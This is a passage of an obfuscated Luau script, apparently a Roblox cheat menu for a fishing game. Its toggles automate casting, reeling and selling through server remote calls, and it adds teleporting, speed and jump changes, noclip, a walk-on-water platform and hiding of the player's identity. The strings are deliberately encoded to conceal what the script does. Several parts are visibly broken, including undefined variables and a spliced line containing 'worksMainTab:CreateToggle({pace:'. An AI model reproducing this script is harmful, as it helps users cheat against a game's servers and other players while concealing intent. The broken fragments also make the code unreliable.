warn(v7("\12\130\2\6\38\200\110\134\6\67\39\206\61\195\30\73\61\154\40\140\5\72\45\155","\186\78\227\112\38\73"));end break;end end end end end local function v36() local v104=0 + 0 ;local v105;while true do if (v104==(853 -(152 + 701))) then v105=v33();if (v105 and v105:FindFirstChild(v7("\249\65\248\91\71\105","\26\156\55\157\53\51")) and v105.events:FindFirstChild(v7("\158\221\5\220\172","\48\236\184\118\185\216"))) then local v181=1311 -(430 + 881) ;while true do if (v181==1) then game:GetService(v7("\215\184\71\60\198\55\228\169\82\52\252\32\234\175\86\55\202","\84\133\221\55\80\175")).packages.Net:FindFirstChild(v7("\143\194\107\132\198\95\182\247\37\165\204\19\152\246\49\175\215","\60\221\135\68\198\167")):FireServer(v105);task.wait(0.1);v181=1 + 1 ;end if (v181==(895 -(557 + 338))) then task.wait(0.1);v105.events.reset:FireServer();v181=1 + 0 ;end if (v181==(5 -3)) then game:GetService(v7("\220\184\232\143\75\218\239\169\253\135\113\205\225\175\249\132\71","\185\142\221\152\227\34")).packages.Net:FindFirstChild(v7("\106\224\24\216\66\48\252\72\196\84\241\12\22\230\77\204\71","\151\56\165\55\154\35\83")):FireServer(v105);break;end end else warn(v7("\146\76\1\174\175\81\69\252\165\80\0\250\224\70\19\235\174\87\69\224\175\87\69\232\175\86\11\234\225","\142\192\35\101"));end break;end end end v22:CreateToggle({[v7("\248\116\36\166","\118\182\21\73\195\135\236\204")]=v7("\41\41\14\79\68\63\248\13\48","\157\104\92\122\32\100\109"),[v7("\133\170\206\205","\203\195\198\175\170\93\71\237")]=v7("\15\121\59\208\93","\156\78\43\94\181\49\113"),[v7("\81\233\200\175\9\66\122\121","\25\18\136\164\195\107\35")]=function(v106) local v107=0;while true do if (0==v107) then _G.AutoReel=v106;spawn(function() while _G.AutoReel do local v182=0;local v183;while true do if (v182==(3 -2)) then if (v183 and v183:FindFirstChild(v7("\254\44\165\90\119\175","\216\136\77\201\47\18\220\161")) and v183.values:FindFirstChild(v7("\47\229\63\223","\226\77\140\75\186\104\188"))) then if (v183.values.bite.Value==true) then local v277=0 -0 ;local v278;while true do if (v277==(0 -0)) then v278=801 -(499 + 302) ;while true do if (v278==(868 -(39 + 827))) then repeat task.wait(0.1 -0 );until v183.values.bite.Value==false  break;end if (1==v278) then task.wait(0.5 -0 );v36();v278=2;end if (v278==0) then task.wait(3.85 -2 );v35();v278=1 -0 ;end end break;end end end end break;end if (v182==(0 + 0)) then task.wait(2 -1 );v183=v33();v182=1 + 0 ;end end end end);break;end end end});v22:CreateToggle({[v7("\151\207\221\58","\47\217\174\176\95")]=v7("\153\200\98\13\242\112\106\41\168\157\84\13\176\86\125\52","\70\216\189\22\98\210\52\24"),[v7("\252\211\162\128","\179\186\191\195\231")]=v7("\221\45\23\244\219\48\26","\132\153\95\120"),[v7("\146\179\2\33\245\219\163\186","\192\209\210\110\77\151\186")]=function(v108) _G.AutoDropBobber=v108;spawn(function() while _G.AutoDropBobber do local v153=0 -0 ;local v154;while true do if (v153==0) then task.wait(0.1);v29=v28();v153=105 -(103 + 1) ;end if (v153==(555 -(475 + 79))) then v154=v29:FindFirstChildOfClass(v7("\212\12\45\229","\164\128\99\66\137\159"));if (v154 and v154:FindFirstChild(v7("\5\159\236\176\20\154","\222\96\233\137")) and v154.events:FindFirstChild(v7("\186\178\180\11","\144\217\211\199\127\232\147"))) then local v225=0;while true do if (v225==1) then if _G.FreezeCharacter then v29.HumanoidRootPart.Anchored=true;end break;end if (v225==(0 -0)) then if _G.FreezeCharacter then v29.HumanoidRootPart.Anchored=false;end v154.events.cast:FireServer(100,3 -2 );v225=1 + 0 ;end end end break;end end end end);end});local v37=v22:CreateDivider();v22:CreateToggle({[v7("\214\46\51\45","\36\152\79\94\72\181\37\98")]=v7("\254\214\84\43\214\214\83\127\229\221\66\51","\95\183\184\39"),[v7("\147\51\230\33","\98\213\95\135\70\52\224")]=v7("\215\173\218\69\81\251\175","\52\158\195\169\23"),[v7("\89\189\62\120\132\52\120\128","\235\26\220\82\20\230\85\27")]=function(v109) local v110=0 + 0 ;while true do if (v110==(1503 -(1395 + 108))) then _G.AutoReel=v109;spawn(function() while _G.AutoReel do local v184=0;local v185;while true do if (v184==1) then if (v185 and v185:FindFirstChild(v7("\158\160\229\215\113\155","\20\232\193\137\162")) and v185.values:FindFirstChild(v7("\32\214\209\163","\17\66\191\165\198\135\236\119"))) then if (v185.values.bite.Value==true) then task.wait(2.2 -1 );v35();task.wait(1204.5 -(7 + 1197) );v36();repeat task.wait(0.1);until v185.values.bite.Value==false  end end break;end if ((0 + 0)==v184) then task.wait(1 + 0 );v185=v33();v184=1;end end end end);break;end end end});local v38=v19:CreateTab(v7("\46\186\186\28","\177\111\207\206\115\159\136\140"),124714113910876);local v39=v38:CreateSection(v7("\36\156\4\27","\63\101\233\112\116\180\47"));v38:CreateToggle({[v7("\237\58\224\23","\86\163\91\141\114\152")]=v7("\114\30\96\124\122\96\14\120\127","\90\51\107\20\19"),[v7("\171\252\132\232","\93\237\144\229\143")]=v7("\52\197\245\21\7","\38\117\150\144\121\107"),[v7("\14\186\226\54\47\186\237\49","\90\77\219\142")]=function(v111) local v112=0;while true do if (v112==(319 -(27 + 292))) then _G.AutoSell=v111;spawn(function() while _G.AutoSell do local v186=0;local v187;while true do if (v186==1) then task.wait(2.5 -1 );break;end if (v186==(0 -0)) then v187=game:GetService(v7("\212\1\49\53\69\4\123\242\1\37\10\88\8\104\231\3\36","\26\134\100\65\89\44\103")).events:FindFirstChild(v7("\194\230\60\47\133\253\239","\196\145\131\80\67"));if v187 then v187:InvokeServer();end v186=4 -3 ;end end end end);break;end end end});local v40=v19:CreateTab(v7("\42\181\10\13\8\231\12\164","\136\126\208\102\104\120"));local v41=v40:CreateSection(v7("\81\153\194\66\161\86\46","\49\24\234\174\35\207\50\93"));v40:CreateDropdown({[v7("\34\243\240\141","\17\108\146\157\232")]=v7("\120\198\24\232\44\188\11\234\7\225\46\166\79","\200\43\163\116\141\79"),[v7("\144\38\41\138\191\250\240","\131\223\86\93\227\208\148")]=v20,[v7("\192\80\164\164\24\187\247\106\166\162\20\186\237","\213\131\37\214\214\125")]={v7("\8\36\43\186","\129\70\75\69\223")},[v7("\107\222\255\253\117\255\74\206\220\249\104\230\73\197\224","\143\38\171\147\137\28")]=false,[v7("\243\131\181\255\1\226\215\219","\180\176\226\217\147\99\131")]=function(v113) local v114=v113[1 -0 ];if  not v114 then local v155=0;while true do if (v155==(139 -(43 + 96))) then warn(v7("\253\182\111\14\192\181\46\9\215\249\60\2\223\188\44\19\214\189\110","\103\179\217\79"));return;end end end print(v7("\121\178\16\208\66\152\166\78\247\53\198\77\141\173\78\237","\195\42\215\124\181\33\236"),v114);local v115=game.Players.LocalPlayer;if  not v115 then local v156=0 -0 ;while true do if (v156==(0 -0)) then warn(v7("\61\85\54\39\32\234\77\87\56\42\101\254\2\76\57\58\100","\152\109\57\87\94\69"));return;end end end local v116=v115.Character or v115.CharacterAdded:Wait() ;local v117=v116 and v116:FindFirstChild(v7("\209\194\7\162\176\221\93\172\203\216\5\183\142\211\70\188","\200\153\183\106\195\222\178\52")) ;if  not v117 then local v157=0;while true do if (v157==0) then local v188=0 + 0 ;while true do if (v188==(0 + 0)) then warn(v7("\26\246\133\60\71\85\59\231\186\50\70\78\2\226\154\41\9\84\61\247\200\59\70\79\60\231\201\125\125\72\43\163\137\58\72\83\60\173","\58\82\131\232\93\41"));return;end end end end end if (v114==v7("\173\88\222\16","\95\227\55\176\117\61")) then local v158=0 -0 ;while true do local v172=0 + 0 ;while true do if (v172==(0 -0)) then if (v158==(0 + 0)) then v21[v7("\54\113\45\78","\203\120\30\67\43")]=v117.Position;print("Saved current position as 'None':",v21[v7("\223\42\67\234","\185\145\69\45\143")]);v158=1 + 0 ;end if (v158==(1752 -(1414 + 337))) then return;end break;end end end end if v21[v114] then local v159=1940 -(1642 + 298) ;while true do if (v159==(0 -0)) then print(v7("\190\26\21\163\204\133\13\13\175\210\141\95\13\169\134","\188\234\127\121\198"),v114,v21[v114]);v117.CFrame=CFrame.new(v21[v114]);break;end end else warn(v7("\22\61\83\128\55\61\1\135\49\60\18\151\61\33\83\133\55\39\29\135\120\52\28\145\120\38\27\134\120\33\22\143\61\49\7\134\60\114\26\144\52\51\29\135\121","\227\88\82\115"));end end});local v42=v19:CreateTab(v7("\110\22\169\164","\19\35\127\218\199\98"));local v43=v42:CreateSection(v7("\48\244\9\227\16\203\6\227\5\254\24","\130\124\155\106"));v42:CreateInput({[v7("\251\202\251\170","\223\181\171\150\207\195\150\28")]=v7("\123\59\239\165\58\92\63\230\170","\105\44\90\131\206"),[v7("\220\245\160\171\13\48\235\214\179\181\29\59","\94\159\128\210\217\104")]=v7("\1\175","\26\48\153\102\223\63\31\153"),[v7("\50\76\236\240\7\72\226\255\6\69\255\199\7\88\249","\147\98\32\141")]=v7("\46\66\239\223\3","\43\120\35\131\170\102\54"),[v7("\102\3\138\185\179\181\176\81\30\147\151\163\164\129\70\32\136\181\176\163\168\91\21\147","\228\52\102\231\214\197\208")]=false,[v7("\56\236\116\205","\182\126\128\21\170\138\235\121")]=v7("\188\219\57\237\181\3\53\3\143","\102\235\186\85\134\230\115\80"),[v7("\116\13\50\83\112\213\33\92","\66\55\108\94\63\18\180")]=function(v118) local v119=0;local v120;while true do if ((0 -0)==v119) then v120=tonumber(v118);if v120 then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v120;else warn(v7("\61\131\147\54\43\80\16\205\178\54\43\82\39\157\128\50\35\25\2\140\137\34\34\24","\57\116\237\229\87\71"));end break;end end end});v42:CreateInput({[v7("\132\176\224\226","\39\202\209\141\135\23\142")]=v7("\213\38\4\26\2\247\232\54\27","\152\159\83\105\106\82"),[v7("\162\211\67\224\204\82\149\240\80\254\220\89","\60\225\166\49\146\169")]=v7("\122\78","\103\79\126\79\74\97"),[v7("\138\115\210\112\91\18\181\115\215\118\76\46\191\103\199","\122\218\31\179\19\62")]=v7("\133\215\193\212\204","\37\211\182\173\161\169\193"),[v7("\197\63\64\214\62\126\141\242\34\89\248\46\111\188\229\28\66\218\61\104\149\248\41\89","\217\151\90\45\185\72\27")]=false,[v7("\229\112\230\21","\54\163\28\135\114")]=v7("\2\206\80\146\126\112\63\222\79","\31\72\187\61\226\46"),[v7("\224\7\79\222\69\127\39\200","\68\163\102\35\178\39\30")]=function(v121) local v122=0;local v123;while true do if (v122==0) then v123=tonumber(v121);if v123 then game.Players.LocalPlayer.Character.Humanoid.JumpPower=v123;else warn(v7("\151\126\204\198\15\188\135\81\148\101\215\215\51\186\148\20\172\48\204\198\15\160\134\80","\113\222\16\186\167\99\213\227"));end break;end end end});local v44={};local v45=593 -393 ;local v46=50 + 100 ;local v47=23342 + 6658 ;v42:CreateToggle({[v7("\0\15\246\243","\150\78\110\155")]=v7("\178\196\43\234\228\17\177\0\146\196\51\228\182","\32\229\165\71\129\196\126\223"),[v7("\224\156\214\147\132\219\215\191\197\141\148\208","\181\163\233\164\225\225")]=false,[v7("\118\135\63\112","\23\48\235\94")]=v7("\107\219\212\86\88\61\197\125\206\221\79","\178\28\186\184\61\55\83"),[v7("\231\204\75\48\240\15\246\207","\149\164\173\39\92\146\110")]=function(v124) local v125=972 -(357 + 615) ;while true do if (v125==(0 + 0)) then _G.WalkOnWater=v124;if v124 then if ( #v44==(0 -0)) then local v226=0 + 0 ;local v227;local v228;while true do if (v226==(2 -1)) then for v263=0,v46-(1 + 0)  do for v281=0 + 0 ,v46-(1 + 0)  do local v282=1301 -(384 + 917) ;local v283;while true do if (v282==(697 -(128 + 569))) then v283=Instance.new(v7("\195\38\2\11","\123\147\71\112\127\122"));v283.Size=Vector3.new(v45,1545 -(1407 + 136) ,v45);break;end end end waterpart.Position=Vector3.new((v263 * v45) -v227 ,2013 -(687 + 1200) ,(j * v45) -v228 );waterpart.Anchored=true;waterpart.CanCollide=true;waterpart.Transparency=0.8;waterpart.Color=Color3.fromRGB(1710 -(556 + 1154) ,255,897 -642 );waterpart.Parent=game.Workspace;table.insert(v44,waterpart);end break;end if (v226==(95 -(9 + 86))) then v227=v47/(423 -(275 + 146)) ;v228=v47/2 ;v226=1 + 0 ;end end end end break;end end end});for v126,v127 in ipairs(v44) do v127.Parent=nil;end v44={};v42:CreateToggle({[v7("\226\204\143\116","\38\172\173\226\17")]=v7("\99\30\15\227\68\1","\143\45\113\76"),[v7("\155\185\16\48\186\185\31\55","\92\216\216\124")]=function(v129) local v130=64 -(29 + 35) ;while true do if ((0 -0)==v130) then _G.NoClip=v129;if _G.NoClip then local v192=0;local v193;while true do if (v192==(0 -0)) then local v244=0;while true do if (v244==(0 -0)) then v193=nil;function v193() while _G.NoClip and task.wait()  do local v288=0;local v289;while true do if ((0 + 0)==v288) then v289=game.Players.LocalPlayer.Character;if v289 then for v301,v302 in pairs(v289:GetDescendants()) do if (v302:IsA(v7("\121\51\191\69\205\90\32\184","\157\59\82\204\32")) and v302.CanCollide) then v302.CanCollide=false;end end end break;end end end end v244=1013 -(53 + 959) ;end if (v244==(409 -(312 + 96))) then v192=1 -0 ;break;end end end if (v192==(286 -(147 + 138))) then spawn(v193);break;end end else local v194=0;local v195;while true do if (v194==(899 -(813 + 86))) then v195=game.Players.LocalPlayer.Character;if v195 then for v271,v272 in pairs(v195:GetDescendants()) do if v272:IsA(v7("\26\63\240\255\217\235\193\165","\209\88\94\131\154\137\138\179")) then v272.CanCollide=true;end end end break;end end end break;end end end});local v48=game.Players.LocalPlayer;local v49=v48 and v48.Character ;local v50=v49 and v49:FindFirstChild(v7("\26\164\215\115\11\49\50\39\59","\66\72\193\164\28\126\67\81")) ;local v51=v50 and v50:FindFirstChild(v7("\224\45\187","\22\135\76\200\56\70")) ;local v52=v50 and v50:FindFirstChild(v7("\130\40\225\35\88\239","\129\237\80\152\68\61")) ;local v53=v50 and v50:FindFirstChild(v7("\94\176\29\244\25\25\16\65\173\5\248\15\94","\56\49\200\100\147\124\119")) ;local v54=v50 and v50:FindFirstChild(v7("\216\59\178\224\201\44\190\228\217\44\186","\144\172\94\223")) ;local v55=v50 and v50:FindFirstChild(v7("\48\10\175\87\33\29\163\83\49\29\167\15\44\10\163\83\109","\39\68\111\194")) ;v42:CreateToggle({[v7("\248\167\234\194","\215\182\198\135\167\25")]=v7("\169\64\249\73\143\69\239\8\191\76\249\71\152\91\233\77\158","\40\237\41\138"),[v7("\228\97\232\234\79\201\96\204\249\70\210\113","\42\167\20\154\152")]=false,[v7("\108\242\163\69","\65\42\158\194\34\17")]=v7("\8\34\65\3\56\255\24\235\9","\142\122\71\50\108\77\141\123"),[v7("\54\163\243\20\57\20\161\244","\91\117\194\159\120")]=function(v131) v51.Disabled=v131;v52.Disbaled=v131;v53.Disabled=v131;v54.Disabled=v131;v55.Disabled=v131;end});v42:CreateToggle({[v7("\52\28\51\29","\68\122\125\94\120\85\145")]=v7("\63\21\203\91\136\240\190\18\18\219\87\220\192","\218\119\124\175\62\168\185"),[v7("\134\229\90\214\160\254\92\242\164\252\93\193","\164\197\144\40")]=false,[v7("\165\252\171\140","\214\227\144\202\235\189")]=v7("\229\172\131\126\25\183\86\50\249\172\147\98","\92\141\197\231\27\112\211\51"),[v7("\197\254\134\175\211\231\252\129","\177\134\159\234\195")]=function(v137) _G.HideIdentity=v137;while _G.HideIdentity do local v144=0 + 0 ;local v145;local v146;local v147;local v148;local v149;local v150;while true do if (v144==0) then v145=game.Players.LocalPlayer;v146=v145.Character or v145.CharacterAdded:Wait() ;v144=1 -0 ;end if ((495 -(18 + 474))==v144) then if v150 then local v205=0;local v206;local v207;while true do if (v205==1) then if v206 then v206.Text=v7("\223\6\80\112\225\249\73\119\110\234","\136\156\105\63\27");end if v207 then v207.Text=v7("\56\131\118\63\18\137\57\28\14\142","\84\123\236\25");end break;end if (v205==(0 + 0)) then v206=v150:FindFirstChild(v7("\34\234\134","\161\78\156\234\118"));v207=v150:FindFirstChild(v7("\164\184\192\210\180","\188\199\215\169"));v205=3 -2 ;end end end if v148 then local v208=0;local v209;local v210;local v211;local v212;local v213;while true do if (v208==(1087 -(860 + 226))) then v211=nil;v212=nil;v208=2;end if ((303 -(121 + 182))==v208) then v209=0 + 0 ;v210=nil;v208=1241 -(988 + 252) ;end if (v208==(1 + 1)) then v213=nil;while true do if (v209==(1 + 2)) then if (v212 and v212:IsA(v7("\119\78\3\33\39\93\173\70\71","\207\35\43\123\85\107\60"))) then v212.Text=v7("\83\165\175\225\112\117\234\136\255\123","\25\16\202\192\138");end if (v213 and v213:IsA(v7("\201\206\181\246\133\245\255\206\161","\148\157\171\205\130\201"))) then v213.Text=v7("\0\219\123\34\216\243\99\252\97\43","\150\67\180\20\73\177");end break;end if (v209==0) then v210=v148:FindFirstChild(v7("\252\142\188\18\160","\213\144\235\202\119\204"));v211=v148:FindFirstChild(v7("\48\12\204\47\41\40","\45\67\120\190\74\72\67"));v209=1971 -(49 + 1921) ;end if (v209==(892 -(223 + 667))) then if (v210 and v210:IsA(v7("\216\36\48\18\87\140\251\41\224","\76\140\65\72\102\27\237\153"))) then v210.Text=v7("\105\213\25\217\222\4\254\98\207\20","\222\42\186\118\178\183\97");end if (v211 and v211:IsA(v7("\105\233\92\158\113\237\70\143\81","\234\61\140\36"))) then v211.Text=v7("\2\210\181\121\6\36\157\146\103\13","\111\65\189\218\18");end v209=3;end if (v209==1) then v212=v148:FindFirstChild(v7("\52\43\249\169\252","\137\64\66\141\197\153\232\142"));v213=v148:FindFirstChild(v7("\22\195\39\180","\232\99\176\66\198"));v209=54 -(51 + 1) ;end end break;end end end v144=6 -2 ;end if (v144==(1 -0)) then v147=v146 and v146:FindFirstChild(v7("\149\254\50\161\199\178\226\59\146\198\178\255\15\161\219\169","\169\221\139\95\192")) ;v148=v147 and v147:FindFirstChild(v7("\203\152\122\45","\70\190\235\31\95\66")) ;v144=1127 -(146 + 979) ;end if (v144==(1 + 1)) then local v178=605 -(311 + 294) ;while true do if (v178==1) then v144=8 -5 ;break;end if (v178==(0 + 0)) then v149=v145:FindFirstChildOfClass(v7("\138\238\27\255\224\168\197\15\239","\133\218\130\122\134")) and v145.PlayerGui:FindFirstChild(v7("\52\234\231","\88\92\159\131\164\188\195")) ;v150=v149 and v149:FindFirstChild(v7("\147\47\185\78\205\228\211\133","\189\224\78\223\43\183\139")) ;v178=1444 -(496 + 947) ;end end end if (v144==(1362 -(1233 + 125))) then task.wait(1);break;end end end end});v42:CreateDivider();v42:CreateSection(v7("\171\40\41","\45\237\120\122"));v42:CreateToggle({[v7("\249\233\175\41","\76\183\136\194")]=v7("\86\233\242\120\119\93\21\106\238\236\59\67\15\57\117\226\224","\116\26\134\133\88\48\47"),[v7("\61\212\178\246\184\124\10\247\161\232\168\119","\18\126\161\192\132\221")]=false,[v7("\121\36\175\3","\54\63\72\206\100")]=v7("\228\86\82\93\247\122\216\81\76\121\246","\27\168\57\37\26\133"),[v7("\14\171\112\164\213\44\169\119","\183\77\202\28\200")]=function(v138) _G.LowGraphics=v138;if _G.LowGraphics then local v160=0 + 0 ;local v161;local v162;while true do if (v160==1) then v161.FogEnd=9000000532 -(846 + 198) ;v161.Brightness=0;v160=1647 -(963 + 682) ;end if (v160==2) then for v214,v215 in pairs(v161:GetChildren()) do if (v215:IsA(v7("\197\247\52\54\102\243\254\34\33\87","\35\149\152\71\66")) or v215:IsA(v7("\59\228\77\191\55\60\238\68\181\57\13","\90\121\136\34\208")) or v215:IsA(v7("\229\2\64\12\226\8\83\27\196\26","\126\167\110\53"))) then v215.Enabled=false;end end v162=workspace:FindFirstChildOfClass(v7("\9\21\60\234\221\54\51","\95\93\112\78\152\188"));v160=3;end if (v160==(0 + 0)) then v161=game:GetService(v7("\59\58\142\0\3\58\135\15","\104\119\83\233"));v161.GlobalShadows=false;v160=1;end if (v160==(1507 -(504 + 1000))) then if v162 then local v229=0 + 0 ;while true do if (0==v229) then v162.WaterWaveSize=0 + 0 ;v162.WaterWaveSpeed=0 + 0 ;v229=1 -0 ;end if (v229==(1 + 0)) then v162.WaterReflectance=0 + 0 ;v162.WaterTransparency=182 -(156 + 26) ;break;end end end for v216,v217 in pairs(workspace:GetDescendants()) do if (v217:IsA(v7("\229\240\134\20\232","\178\161\149\229\117\132\222")) or v217:IsA(v7("\188\222\197\184\180\4\163","\67\232\187\189\204\193\118\198"))) then v217.Transparency=1 + 0 ;elseif (v217:IsA(v7("\169\47\166\37\11\3\253\159","\143\235\78\213\64\91\98")) and  not v217:IsA(v7("\160\77\151\225\64\183\159\92","\214\237\40\228\137\16"))) then v217.Material=Enum.Material.Plastic;end end break;end end else local v163=0 -0 ;local v164;local v165;while true do if (v163==(164 -(149 + 15))) then v164=game:GetService(v7("\169\234\232\209\23\175\139\228","\198\229\131\143\185\99"));v164.GlobalShadows=true;v163=961 -(890 + 70) ;end if (2==v163) then for v218,v219 in pairs(v164:GetChildren()) do if (v219:IsA(v7("\97\131\187\103\116\138\174\118\82\152","\19\49\236\200")) or v219:IsA(v7("\220\59\249\184\233\159\248\49\243\180\240","\218\158\87\150\215\132")) or v219:IsA(v7("\217\18\204\240\19\36\203\254\29\205","\173\155\126\185\130\86\66"))) then v219.Enabled=true;end end v165=worksMainTab:CreateToggle({pace:FindFirstChildOfClass(v7("\209\163\168\213\137\229\235","\140\133\198\218\167\232"))});v163=3;end if (v163==1) then v164.FogEnd=100000;v164.Brightness=484 -(14 + 468) ;v163=2;end if (v163==(6 -3)) then if v165 then v165.WaterWaveSize=1;v165.WaterWaveSpeed=10;v165.WaterReflectance=2 -1 ;v165.WaterTransparency=0.5;end for v220,v221 in pairs(workspace:GetDescendants()) do if (v221:IsA(v7("\145\43\183\124\136","\228\213\78\212\29")) or v221:IsA(v7("\179\73\174\17\254\149\73","\139\231\44\214\101"))) then v221.Transparency=0 + 0 ;elseif (v221:IsA(v7("\251\238\21\91\32\176\35\2","\118\185\143\102\62\112\209\81")) and  not v221:IsA(v7("\113\117\58\238\149\20\14\44","\88\60\16\73\134\197\117\124"))) then v221.Material=Enum.Material.SmoothPlastic;end end break;end end end end});